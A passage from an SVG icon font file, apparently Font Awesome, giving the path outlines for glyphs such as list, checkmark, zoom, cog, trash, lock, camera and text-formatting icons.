q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM1792 1312v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68z" />
    <glyph glyph-name="th_list" unicode="&#xf00b;" horiz-adv-x="1792" 
d="M512 288v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM512 800v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM1792 288v-192q0 -40 -28 -68t-68 -28h-960
q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h960q40 0 68 -28t28 -68zM512 1312v-192q0 -40 -28 -68t-68 -28h-320q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h320q40 0 68 -28t28 -68zM1792 800v-192q0 -40 -28 -68t-68 -28h-960q-40 0 -68 28t-28 68v192q0 40 28 68t68 28
h960q40 0 68 -28t28 -68zM1792 1312v-192q0 -40 -28 -68t-68 -28h-960q-40 0 -68 28t-28 68v192q0 40 28 68t68 28h960q40 0 68 -28t28 -68z" />
    <glyph glyph-name="ok" unicode="&#xf00c;" horiz-adv-x="1792" 
d="M1671 970q0 -40 -28 -68l-724 -724l-136 -136q-28 -28 -68 -28t-68 28l-136 136l-362 362q-28 28 -28 68t28 68l136 136q28 28 68 28t68 -28l294 -295l656 657q28 28 68 28t68 -28l136 -136q28 -28 28 -68z" />
    <glyph glyph-name="remove" unicode="&#xf00d;" horiz-adv-x="1408" 
d="M1298 214q0 -40 -28 -68l-136 -136q-28 -28 -68 -28t-68 28l-294 294l-294 -294q-28 -28 -68 -28t-68 28l-136 136q-28 28 -28 68t28 68l294 294l-294 294q-28 28 -28 68t28 68l136 136q28 28 68 28t68 -28l294 -294l294 294q28 28 68 28t68 -28l136 -136q28 -28 28 -68
t-28 -68l-294 -294l294 -294q28 -28 28 -68z" />
    <glyph glyph-name="zoom_in" unicode="&#xf00e;" horiz-adv-x="1664" 
d="M1024 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-224v-224q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v224h-224q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h224v224q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5v-224h224
q13 0 22.5 -9.5t9.5 -22.5zM1152 704q0 185 -131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5t316.5 131.5t131.5 316.5zM1664 -128q0 -53 -37.5 -90.5t-90.5 -37.5q-54 0 -90 38l-343 342q-179 -124 -399 -124q-143 0 -273.5 55.5
t-225 150t-150 225t-55.5 273.5t55.5 273.5t150 225t225 150t273.5 55.5t273.5 -55.5t225 -150t150 -225t55.5 -273.5q0 -220 -124 -399l343 -343q37 -37 37 -90z" />
    <glyph glyph-name="zoom_out" unicode="&#xf010;" horiz-adv-x="1664" 
d="M1024 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-576q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h576q13 0 22.5 -9.5t9.5 -22.5zM1152 704q0 185 -131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5t316.5 131.5t131.5 316.5z
M1664 -128q0 -53 -37.5 -90.5t-90.5 -37.5q-54 0 -90 38l-343 342q-179 -124 -399 -124q-143 0 -273.5 55.5t-225 150t-150 225t-55.5 273.5t55.5 273.5t150 225t225 150t273.5 55.5t273.5 -55.5t225 -150t150 -225t55.5 -273.5q0 -220 -124 -399l343 -343q37 -37 37 -90z
" />
    <glyph glyph-name="off" unicode="&#xf011;" 
d="M1536 640q0 -156 -61 -298t-164 -245t-245 -164t-298 -61t-298 61t-245 164t-164 245t-61 298q0 182 80.5 343t226.5 270q43 32 95.5 25t83.5 -50q32 -42 24.5 -94.5t-49.5 -84.5q-98 -74 -151.5 -181t-53.5 -228q0 -104 40.5 -198.5t109.5 -163.5t163.5 -109.5
t198.5 -40.5t198.5 40.5t163.5 109.5t109.5 163.5t40.5 198.5q0 121 -53.5 228t-151.5 181q-42 32 -49.5 84.5t24.5 94.5q31 43 84 50t95 -25q146 -109 226.5 -270t80.5 -343zM896 1408v-640q0 -52 -38 -90t-90 -38t-90 38t-38 90v640q0 52 38 90t90 38t90 -38t38 -90z" />
    <glyph glyph-name="signal" unicode="&#xf012;" horiz-adv-x="1792" 
d="M256 96v-192q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM640 224v-320q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v320q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM1024 480v-576q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23
v576q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM1408 864v-960q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v960q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM1792 1376v-1472q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v1472q0 14 9 23t23 9h192q14 0 23 -9t9 -23z" />
    <glyph glyph-name="cog" unicode="&#xf013;" 
d="M1024 640q0 106 -75 181t-181 75t-181 -75t-75 -181t75 -181t181 -75t181 75t75 181zM1536 749v-222q0 -12 -8 -23t-20 -13l-185 -28q-19 -54 -39 -91q35 -50 107 -138q10 -12 10 -25t-9 -23q-27 -37 -99 -108t-94 -71q-12 0 -26 9l-138 108q-44 -23 -91 -38
q-16 -136 -29 -186q-7 -28 -36 -28h-222q-14 0 -24.5 8.5t-11.5 21.5l-28 184q-49 16 -90 37l-141 -107q-10 -9 -25 -9q-14 0 -25 11q-126 114 -165 168q-7 10 -7 23q0 12 8 23q15 21 51 66.5t54 70.5q-27 50 -41 99l-183 27q-13 2 -21 12.5t-8 23.5v222q0 12 8 23t19 13
l186 28q14 46 39 92q-40 57 -107 138q-10 12 -10 24q0 10 9 23q26 36 98.5 107.5t94.5 71.5q13 0 26 -10l138 -107q44 23 91 38q16 136 29 186q7 28 36 28h222q14 0 24.5 -8.5t11.5 -21.5l28 -184q49 -16 90 -37l142 107q9 9 24 9q13 0 25 -10q129 -119 165 -170q7 -8 7 -22
q0 -12 -8 -23q-15 -21 -51 -66.5t-54 -70.5q26 -50 41 -98l183 -28q13 -2 21 -12.5t8 -23.5z" />
    <glyph glyph-name="trash" unicode="&#xf014;" horiz-adv-x="1408" 
d="M512 800v-576q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v576q0 14 9 23t23 9h64q14 0 23 -9t9 -23zM768 800v-576q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v576q0 14 9 23t23 9h64q14 0 23 -9t9 -23zM1024 800v-576q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v576
q0 14 9 23t23 9h64q14 0 23 -9t9 -23zM1152 76v948h-896v-948q0 -22 7 -40.5t14.5 -27t10.5 -8.5h832q3 0 10.5 8.5t14.5 27t7 40.5zM480 1152h448l-48 117q-7 9 -17 11h-317q-10 -2 -17 -11zM1408 1120v-64q0 -14 -9 -23t-23 -9h-96v-948q0 -83 -47 -143.5t-113 -60.5h-832
q-66 0 -113 58.5t-47 141.5v952h-96q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h309l70 167q15 37 54 63t79 26h320q40 0 79 -26t54 -63l70 -167h309q14 0 23 -9t9 -23z" />
    <glyph glyph-name="home" unicode="&#xf015;" horiz-adv-x="1664" 
d="M1408 544v-480q0 -26 -19 -45t-45 -19h-384v384h-256v-384h-384q-26 0 -45 19t-19 45v480q0 1 0.5 3t0.5 3l575 474l575 -474q1 -2 1 -6zM1631 613l-62 -74q-8 -9 -21 -11h-3q-13 0 -21 7l-692 577l-692 -577q-12 -8 -24 -7q-13 2 -21 11l-62 74q-8 10 -7 23.5t11 21.5
l719 599q32 26 76 26t76 -26l244 -204v195q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-408l219 -182q10 -8 11 -21.5t-7 -23.5z" />
    <glyph glyph-name="file_alt" unicode="&#xf016;" 
d="M1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-768v-1536h1280z
" />
    <glyph glyph-name="time" unicode="&#xf017;" 
d="M896 992v-448q0 -14 -9 -23t-23 -9h-320q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h224v352q0 14 9 23t23 9h64q14 0 23 -9t9 -23zM1312 640q0 148 -73 273t-198 198t-273 73t-273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273zM1536 640
q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="road" unicode="&#xf018;" horiz-adv-x="1920" 
d="M1111 540v4l-24 320q-1 13 -11 22.5t-23 9.5h-186q-13 0 -23 -9.5t-11 -22.5l-24 -320v-4q-1 -12 8 -20t21 -8h244q12 0 21 8t8 20zM1870 73q0 -73 -46 -73h-704q13 0 22 9.5t8 22.5l-20 256q-1 13 -11 22.5t-23 9.5h-272q-13 0 -23 -9.5t-11 -22.5l-20 -256
q-1 -13 8 -22.5t22 -9.5h-704q-46 0 -46 73q0 54 26 116l417 1044q8 19 26 33t38 14h339q-13 0 -23 -9.5t-11 -22.5l-15 -192q-1 -14 8 -23t22 -9h166q13 0 22 9t8 23l-15 192q-1 13 -11 22.5t-23 9.5h339q20 0 38 -14t26 -33l417 -1044q26 -62 26 -116z" />
    <glyph glyph-name="download_alt" unicode="&#xf019;" horiz-adv-x="1664" 
d="M1280 192q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1536 192q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1664 416v-320q0 -40 -28 -68t-68 -28h-1472q-40 0 -68 28t-28 68v320q0 40 28 68t68 28h465l135 -136
q58 -56 136 -56t136 56l136 136h464q40 0 68 -28t28 -68zM1339 985q17 -41 -14 -70l-448 -448q-18 -19 -45 -19t-45 19l-448 448q-31 29 -14 70q17 39 59 39h256v448q0 26 19 45t45 19h256q26 0 45 -19t19 -45v-448h256q42 0 59 -39z" />
    <glyph glyph-name="download" unicode="&#xf01a;" 
d="M1120 608q0 -12 -10 -24l-319 -319q-11 -9 -23 -9t-23 9l-320 320q-15 16 -7 35q8 20 30 20h192v352q0 14 9 23t23 9h192q14 0 23 -9t9 -23v-352h192q14 0 23 -9t9 -23zM768 1184q-148 0 -273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273
t-73 273t-198 198t-273 73zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="upload" unicode="&#xf01b;" 
d="M1118 660q-8 -20 -30 -20h-192v-352q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v352h-192q-14 0 -23 9t-9 23q0 12 10 24l319 319q11 9 23 9t23 -9l320 -320q15 -16 7 -35zM768 1184q-148 0 -273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198
t73 273t-73 273t-198 198t-273 73zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="inbox" unicode="&#xf01c;" 
d="M1023 576h316q-1 3 -2.5 8.5t-2.5 7.5l-212 496h-708l-212 -496q-1 -3 -2.5 -8.5t-2.5 -7.5h316l95 -192h320zM1536 546v-482q0 -26 -19 -45t-45 -19h-1408q-26 0 -45 19t-19 45v482q0 62 25 123l238 552q10 25 36.5 42t52.5 17h832q26 0 52.5 -17t36.5 -42l238 -552
q25 -61 25 -123z" />
    <glyph glyph-name="play_circle" unicode="&#xf01d;" 
d="M1184 640q0 -37 -32 -55l-544 -320q-15 -9 -32 -9q-16 0 -32 8q-32 19 -32 56v640q0 37 32 56q33 18 64 -1l544 -320q32 -18 32 -55zM1312 640q0 148 -73 273t-198 198t-273 73t-273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273zM1536 640
q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
    <glyph glyph-name="repeat" unicode="&#xf01e;" 
d="M1536 1280v-448q0 -26 -19 -45t-45 -19h-448q-42 0 -59 40q-17 39 14 69l138 138q-148 137 -349 137q-104 0 -198.5 -40.5t-163.5 -109.5t-109.5 -163.5t-40.5 -198.5t40.5 -198.5t109.5 -163.5t163.5 -109.5t198.5 -40.5q119 0 225 52t179 147q7 10 23 12q15 0 25 -9
l137 -138q9 -8 9.5 -20.5t-7.5 -22.5q-109 -132 -264 -204.5t-327 -72.5q-156 0 -298 61t-245 164t-164 245t-61 298t61 298t164 245t245 164t298 61q147 0 284.5 -55.5t244.5 -156.5l130 129q29 31 70 14q39 -17 39 -59z" />
    <glyph glyph-name="refresh" unicode="&#xf021;" 
d="M1511 480q0 -5 -1 -7q-64 -268 -268 -434.5t-478 -166.5q-146 0 -282.5 55t-243.5 157l-129 -129q-19 -19 -45 -19t-45 19t-19 45v448q0 26 19 45t45 19h448q26 0 45 -19t19 -45t-19 -45l-137 -137q71 -66 161 -102t187 -36q134 0 250 65t186 179q11 17 53 117
q8 23 30 23h192q13 0 22.5 -9.5t9.5 -22.5zM1536 1280v-448q0 -26 -19 -45t-45 -19h-448q-26 0 -45 19t-19 45t19 45l138 138q-148 137 -349 137q-134 0 -250 -65t-186 -179q-11 -17 -53 -117q-8 -23 -30 -23h-199q-13 0 -22.5 9.5t-9.5 22.5v7q65 268 270 434.5t480 166.5
q146 0 284 -55.5t245 -156.5l130 129q19 19 45 19t45 -19t19 -45z" />
    <glyph glyph-name="list_alt" unicode="&#xf022;" horiz-adv-x="1792" 
d="M384 352v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM384 608v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z
M384 864v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM1536 352v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-960q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h960q13 0 22.5 -9.5t9.5 -22.5z
M1536 608v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-960q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h960q13 0 22.5 -9.5t9.5 -22.5zM1536 864v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-960q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h960q13 0 22.5 -9.5
t9.5 -22.5zM1664 160v832q0 13 -9.5 22.5t-22.5 9.5h-1472q-13 0 -22.5 -9.5t-9.5 -22.5v-832q0 -13 9.5 -22.5t22.5 -9.5h1472q13 0 22.5 9.5t9.5 22.5zM1792 1248v-1088q0 -66 -47 -113t-113 -47h-1472q-66 0 -113 47t-47 113v1088q0 66 47 113t113 47h1472q66 0 113 -47
t47 -113z" />
    <glyph glyph-name="lock" unicode="&#xf023;" horiz-adv-x="1152" 
d="M320 768h512v192q0 106 -75 181t-181 75t-181 -75t-75 -181v-192zM1152 672v-576q0 -40 -28 -68t-68 -28h-960q-40 0 -68 28t-28 68v576q0 40 28 68t68 28h32v192q0 184 132 316t316 132t316 -132t132 -316v-192h32q40 0 68 -28t28 -68z" />
    <glyph glyph-name="flag" unicode="&#xf024;" horiz-adv-x="1792" 
d="M320 1280q0 -72 -64 -110v-1266q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v1266q-64 38 -64 110q0 53 37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1792 1216v-763q0 -25 -12.5 -38.5t-39.5 -27.5q-215 -116 -369 -116q-61 0 -123.5 22t-108.5 48
t-115.5 48t-142.5 22q-192 0 -464 -146q-17 -9 -33 -9q-26 0 -45 19t-19 45v742q0 32 31 55q21 14 79 43q236 120 421 120q107 0 200 -29t219 -88q38 -19 88 -19q54 0 117.5 21t110 47t88 47t54.5 21q26 0 45 -19t19 -45z" />
    <glyph glyph-name="headphones" unicode="&#xf025;" horiz-adv-x="1664" 
d="M1664 650q0 -166 -60 -314l-20 -49l-185 -33q-22 -83 -90.5 -136.5t-156.5 -53.5v-32q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v576q0 14 9 23t23 9h64q14 0 23 -9t9 -23v-32q71 0 130 -35.5t93 -95.5l68 12q29 95 29 193q0 148 -88 279t-236.5 209t-315.5 78
t-315.5 -78t-236.5 -209t-88 -279q0 -98 29 -193l68 -12q34 60 93 95.5t130 35.5v32q0 14 9 23t23 9h64q14 0 23 -9t9 -23v-576q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v32q-88 0 -156.5 53.5t-90.5 136.5l-185 33l-20 49q-60 148 -60 314q0 151 67 291t179 242.5
t266 163.5t320 61t320 -61t266 -163.5t179 -242.5t67 -291z" />
    <glyph glyph-name="volume_off" unicode="&#xf026;" horiz-adv-x="768" 
d="M768 1184v-1088q0 -26 -19 -45t-45 -19t-45 19l-333 333h-262q-26 0 -45 19t-19 45v384q0 26 19 45t45 19h262l333 333q19 19 45 19t45 -19t19 -45z" />
    <glyph glyph-name="volume_down" unicode="&#xf027;" horiz-adv-x="1152" 
d="M768 1184v-1088q0 -26 -19 -45t-45 -19t-45 19l-333 333h-262q-26 0 -45 19t-19 45v384q0 26 19 45t45 19h262l333 333q19 19 45 19t45 -19t19 -45zM1152 640q0 -76 -42.5 -141.5t-112.5 -93.5q-10 -5 -25 -5q-26 0 -45 18.5t-19 45.5q0 21 12 35.5t29 25t34 23t29 36
t12 56.5t-12 56.5t-29 36t-34 23t-29 25t-12 35.5q0 27 19 45.5t45 18.5q15 0 25 -5q70 -27 112.5 -93t42.5 -142z" />
    <glyph glyph-name="volume_up" unicode="&#xf028;" horiz-adv-x="1664" 
d="M768 1184v-1088q0 -26 -19 -45t-45 -19t-45 19l-333 333h-262q-26 0 -45 19t-19 45v384q0 26 19 45t45 19h262l333 333q19 19 45 19t45 -19t19 -45zM1152 640q0 -76 -42.5 -141.5t-112.5 -93.5q-10 -5 -25 -5q-26 0 -45 18.5t-19 45.5q0 21 12 35.5t29 25t34 23t29 36
t12 56.5t-12 56.5t-29 36t-34 23t-29 25t-12 35.5q0 27 19 45.5t45 18.5q15 0 25 -5q70 -27 112.5 -93t42.5 -142zM1408 640q0 -153 -85 -282.5t-225 -188.5q-13 -5 -25 -5q-27 0 -46 19t-19 45q0 39 39 59q56 29 76 44q74 54 115.5 135.5t41.5 173.5t-41.5 173.5
t-115.5 135.5q-20 15 -76 44q-39 20 -39 59q0 26 19 45t45 19q13 0 26 -5q140 -59 225 -188.5t85 -282.5zM1664 640q0 -230 -127 -422.5t-338 -283.5q-13 -5 -26 -5q-26 0 -45 19t-19 45q0 36 39 59q7 4 22.5 10.5t22.5 10.5q46 25 82 51q123 91 192 227t69 289t-69 289
t-192 227q-36 26 -82 51q-7 4 -22.5 10.5t-22.5 10.5q-39 23 -39 59q0 26 19 45t45 19q13 0 26 -5q211 -91 338 -283.5t127 -422.5z" />
    <glyph glyph-name="qrcode" unicode="&#xf029;" horiz-adv-x="1408" 
d="M384 384v-128h-128v128h128zM384 1152v-128h-128v128h128zM1152 1152v-128h-128v128h128zM128 129h384v383h-384v-383zM128 896h384v384h-384v-384zM896 896h384v384h-384v-384zM640 640v-640h-640v640h640zM1152 128v-128h-128v128h128zM1408 128v-128h-128v128h128z
M1408 640v-384h-384v128h-128v-384h-128v640h384v-128h128v128h128zM640 1408v-640h-640v640h640zM1408 1408v-640h-640v640h640z" />
    <glyph glyph-name="barcode" unicode="&#xf02a;" horiz-adv-x="1792" 
d="M63 0h-63v1408h63v-1408zM126 1h-32v1407h32v-1407zM220 1h-31v1407h31v-1407zM377 1h-31v1407h31v-1407zM534 1h-62v1407h62v-1407zM660 1h-31v1407h31v-1407zM723 1h-31v1407h31v-1407zM786 1h-31v1407h31v-1407zM943 1h-63v1407h63v-1407zM1100 1h-63v1407h63v-1407z
M1226 1h-63v1407h63v-1407zM1352 1h-63v1407h63v-1407zM1446 1h-63v1407h63v-1407zM1635 1h-94v1407h94v-1407zM1698 1h-32v1407h32v-1407zM1792 0h-63v1408h63v-1408z" />
    <glyph glyph-name="tag" unicode="&#xf02b;" 
d="M448 1088q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1515 512q0 -53 -37 -90l-491 -492q-39 -37 -91 -37q-53 0 -90 37l-715 716q-38 37 -64.5 101t-26.5 117v416q0 52 38 90t90 38h416q53 0 117 -26.5t102 -64.5
l715 -714q37 -39 37 -91z" />
    <glyph glyph-name="tags" unicode="&#xf02c;" horiz-adv-x="1920" 
d="M448 1088q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1515 512q0 -53 -37 -90l-491 -492q-39 -37 -91 -37q-53 0 -90 37l-715 716q-38 37 -64.5 101t-26.5 117v416q0 52 38 90t90 38h416q53 0 117 -26.5t102 -64.5
l715 -714q37 -39 37 -91zM1899 512q0 -53 -37 -90l-491 -492q-39 -37 -91 -37q-36 0 -59 14t-53 45l470 470q37 37 37 90q0 52 -37 91l-715 714q-38 38 -102 64.5t-117 26.5h224q53 0 117 -26.5t102 -64.5l715 -714q37 -39 37 -91z" />
    <glyph glyph-name="book" unicode="&#xf02d;" horiz-adv-x="1664" 
d="M1639 1058q40 -57 18 -129l-275 -906q-19 -64 -76.5 -107.5t-122.5 -43.5h-923q-77 0 -148.5 53.5t-99.5 131.5q-24 67 -2 127q0 4 3 27t4 37q1 8 -3 21.5t-3 19.5q2 11 8 21t16.5 23.5t16.5 23.5q23 38 45 91.5t30 91.5q3 10 0.5 30t-0.5 28q3 11 17 28t17 23
q21 36 42 92t25 90q1 9 -2.5 32t0.5 28q4 13 22 30.5t22 22.5q19 26 42.5 84.5t27.5 96.5q1 8 -3 25.5t-2 26.5q2 8 9 18t18 23t17 21q8 12 16.5 30.5t15 35t16 36t19.5 32t26.5 23.5t36 11.5t47.5 -5.5l-1 -3q38 9 51 9h761q74 0 114 -56t18 -130l-274 -906
q-36 -119 -71.5 -153.5t-128.5 -34.5h-869q-27 0 -38 -15q-11 -16 -1 -43q24 -70 144 -70h923q29 0 56 15.5t35 41.5l300 987q7 22 5 57q38 -15 59 -43zM575 1056q-4 -13 2 -22.5t20 -9.5h608q13 0 25.5 9.5t16.5 22.5l21 64q4 13 -2 22.5t-20 9.5h-608q-13 0 -25.5 -9.5
t-16.5 -22.5zM492 800q-4 -13 2 -22.5t20 -9.5h608q13 0 25.5 9.5t16.5 22.5l21 64q4 13 -2 22.5t-20 9.5h-608q-13 0 -25.5 -9.5t-16.5 -22.5z" />
    <glyph glyph-name="bookmark" unicode="&#xf02e;" horiz-adv-x="1280" 
d="M1164 1408q23 0 44 -9q33 -13 52.5 -41t19.5 -62v-1289q0 -34 -19.5 -62t-52.5 -41q-19 -8 -44 -8q-48 0 -83 32l-441 424l-441 -424q-36 -33 -83 -33q-23 0 -44 9q-33 13 -52.5 41t-19.5 62v1289q0 34 19.5 62t52.5 41q21 9 44 9h1048z" />
    <glyph glyph-name="print" unicode="&#xf02f;" horiz-adv-x="1664" 
d="M384 0h896v256h-896v-256zM384 640h896v384h-160q-40 0 -68 28t-28 68v160h-640v-640zM1536 576q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1664 576v-416q0 -13 -9.5 -22.5t-22.5 -9.5h-224v-160q0 -40 -28 -68t-68 -28h-960q-40 0 -68 28t-28 68
v160h-224q-13 0 -22.5 9.5t-9.5 22.5v416q0 79 56.5 135.5t135.5 56.5h64v544q0 40 28 68t68 28h672q40 0 88 -20t76 -48l152 -152q28 -28 48 -76t20 -88v-256h64q79 0 135.5 -56.5t56.5 -135.5z" />
    <glyph glyph-name="camera" unicode="&#xf030;" horiz-adv-x="1920" 
d="M960 864q119 0 203.5 -84.5t84.5 -203.5t-84.5 -203.5t-203.5 -84.5t-203.5 84.5t-84.5 203.5t84.5 203.5t203.5 84.5zM1664 1280q106 0 181 -75t75 -181v-896q0 -106 -75 -181t-181 -75h-1408q-106 0 -181 75t-75 181v896q0 106 75 181t181 75h224l51 136
q19 49 69.5 84.5t103.5 35.5h512q53 0 103.5 -35.5t69.5 -84.5l51 -136h224zM960 128q185 0 316.5 131.5t131.5 316.5t-131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5z" />
    <glyph glyph-name="font" unicode="&#xf031;" horiz-adv-x="1664" 
d="M725 977l-170 -450q33 0 136.5 -2t160.5 -2q19 0 57 2q-87 253 -184 452zM0 -128l2 79q23 7 56 12.5t57 10.5t49.5 14.5t44.5 29t31 50.5l237 616l280 724h75h53q8 -14 11 -21l205 -480q33 -78 106 -257.5t114 -274.5q15 -34 58 -144.5t72 -168.5q20 -45 35 -57
q19 -15 88 -29.5t84 -20.5q6 -38 6 -57q0 -5 -0.5 -13.5t-0.5 -12.5q-63 0 -190 8t-191 8q-76 0 -215 -7t-178 -8q0 43 4 78l131 28q1 0 12.5 2.5t15.5 3.5t14.5 4.5t15 6.5t11 8t9 11t2.5 14q0 16 -31 96.5t-72 177.5t-42 100l-450 2q-26 -58 -76.5 -195.5t-50.5 -162.5
q0 -22 14 -37.5t43.5 -24.5t48.5 -13.5t57 -8.5t41 -4q1 -19 1 -58q0 -9 -2 -27q-58 0 -174.5 10t-174.5 10q-8 0 -26.5 -4t-21.5 -4q-80 -14 -188 -14z" />
    <glyph glyph-name="bold" unicode="&#xf032;" horiz-adv-x="1408" 
d="M555 15q74 -32 140 -32q376 0 376 335q0 114 -41 180q-27 44 -61.5 74t-67.5 46.5t-80.5 25t-84 10.5t-94.5 2q-73 0 -101 -10q0 -53 -0.5 -159t-0.5 -158q0 -8 -1 -67.5t-0.5 -96.5t4.5 -83.5t12 -66.5zM541 761q42 -7 109 -7q82 0 143 13t110 44.5t74.5 89.5t25.5 142
q0 70 -29 122.5t-79 82t-108 43.5t-124 14q-50 0 -130 -13q0 -50 4 -151t4 -152q0 -27 -0.5 -80t-0.5 -79q0 -46 1 -69zM0 -128l2 94q15 4 85 16t106 27q7 12 12.5 27t8.5 33.5t5.5 32.5t3 37.5t0.5 34v35.5v30q0 982 -22 1025q-4 8 -22 14.5t-44.5 11t-49.5 7t-48.5 4.5
t-30.5 3l-4 83q98 2 340 11.5t373 9.5q23 0 68 -0.5t68 -0.5q70 0 136.5 -13t128.5 -42t108 -71t74 -104.5t28 -137.5q0 -52 -16.5 -95.5t-39 -72t-64.5 -57.5t-73 -45t-84 -40q154 -35 256.5 -134t102.5 -248q0 -100 -35 -179.5t-93.5 -130.5t-138 -85.5t-163.5 -48.5
t-176 -14q-44 0 -132 3t-132 3q-106 0 -307 -11t-231 -12z" />
    <glyph glyph-name="italic" unicode="&#xf033;" horiz-adv-x="1024" 
d="M0 -126l17 85q22 7 61.5 16.5t72 19t59.5 23.5q28 35 41 101q1 7 62 289t114 543.5t52 296.5v25q-24 13 -54.5 18.5t-69.5 8t-58 5.5l19 103q33 -2 120 -6.5t149.5 -7t120.5 -2.5q48 0 98.5 2.5t121 7t98.5 6.5q-5 -39 -19 -89q-30 -10 -101.5 -28.5t-108.5 -33.5
q-8 -19 -14 -42.5t-9 -40t-7.5 -45.5t-6.5 -42q-27 -148 -87.5 -419.5t-77.5 -355.5q-2 -9 -13 -58t-20 -90t-16 -83.5t-6 -57.5l1 -18q17 -4 185 -31q-3 -44 -16 -99q-11 0 -32.5 -1.5t-32.5 -1.5q-29 0 -87 10t-86 10q-138 2 -206 2q-51 0 -143 -9t-121 -11z" />
    <glyph glyph-name="text_height" unicode="&#xf034;" horiz-adv-x="1792" 
